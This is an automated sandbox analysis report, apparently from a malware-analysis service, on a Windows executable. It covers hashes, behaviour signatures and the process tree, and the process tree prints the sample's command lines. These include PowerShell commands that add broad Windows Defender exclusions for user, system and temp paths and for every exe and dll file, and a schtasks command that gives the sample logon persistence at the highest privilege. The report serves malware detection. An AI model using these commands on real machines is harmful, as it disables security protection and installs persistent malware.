Analysis
max time kernel: 126s
max time network: 135s
platform: windows7_x64
resource: win7-en-20210920
submitted: 14-10-2021 05:08

Static task: static1
Behavioral task: behavioral1
Sample: fa409741e16094bb8bc373d7b46742cd.exe
Resource: win7-en-20210920

General
Target: fa409741e16094bb8bc373d7b46742cd.exe
Size: 1.9MB
MD5: fa409741e16094bb8bc373d7b46742cd
SHA1: e082dd13c52fe7fb65fac801d2588e0c9153d9cc
SHA256: c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8
SHA512: 7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f
Malware Config
Signatures

Executes dropped EXE (2 IoCs)
Processes (pid, process):
1772 shrome.exe
1276 sihost32.exe

Loads dropped DLL (4 IoCs)
Processes (pid, process):
1748 cmd.exe
1748 cmd.exe
548 conhost.exe
548 conhost.exe

Drops file in System32 directory (6 IoCs)
Processes (description | ioc | process):
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\system32\shrome.exe | conhost.exe
File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | conhost.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes (pid, process):
1408 conhost.exe
1228 powershell.exe
1508 powershell.exe
548 conhost.exe
548 conhost.exe
112 powershell.exe
1132 powershell.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes (description | pid | process):
Token: SeDebugPrivilege | 1408 | conhost.exe
Token: SeDebugPrivilege | 1228 | powershell.exe
Token: SeDebugPrivilege | 1508 | powershell.exe
Token: SeDebugPrivilege | 548 | conhost.exe
Token: SeDebugPrivilege | 112 | powershell.exe
Token: SeDebugPrivilege | 1132 | powershell.exe

Suspicious use of WriteProcessMemory (41 IoCs)
Processes (pid | process | target pid | target process | count of "wrote to memory of" events):
1316 | fa409741e16094bb8bc373d7b46742cd.exe | 1408 | conhost.exe | 4
1408 | conhost.exe | 1452 | cmd.exe | 3
1452 | cmd.exe | 1228 | powershell.exe | 3
1408 | conhost.exe | 1144 | cmd.exe | 3
1144 | cmd.exe | 1816 | schtasks.exe | 3
1452 | cmd.exe | 1508 | powershell.exe | 3
1408 | conhost.exe | 1748 | cmd.exe | 3
1748 | cmd.exe | 1772 | shrome.exe | 3
1772 | shrome.exe | 548 | conhost.exe | 4
548 | conhost.exe | 1752 | cmd.exe | 3
1752 | cmd.exe | 112 | powershell.exe | 3
548 | conhost.exe | 1276 | sihost32.exe | 3
1752 | cmd.exe | 1132 | powershell.exe | 3
Processes (process tree; each entry gives the image path, its command line, and the signatures hit)

C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\conhost.exe
    command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe
      command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\cmd.exe
      command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\schtasks.exe
        command line: schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"
        - Creates scheduled task(s)

    C:\Windows\System32\cmd.exe
      command line: "cmd" cmd /c "C:\Windows\system32\shrome.exe"
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\shrome.exe
        command line: C:\Windows\system32\shrome.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\conhost.exe
          command line: "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\shrome.exe"
          - Loads dropped DLL
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

          C:\Windows\System32\cmd.exe
            command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
            - Suspicious use of WriteProcessMemory

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

          C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
            command line: "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
            - Executes dropped EXE

            C:\Windows\System32\conhost.exe
              command line: "C:\Windows\System32\\conhost.exe" "/sihost32"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads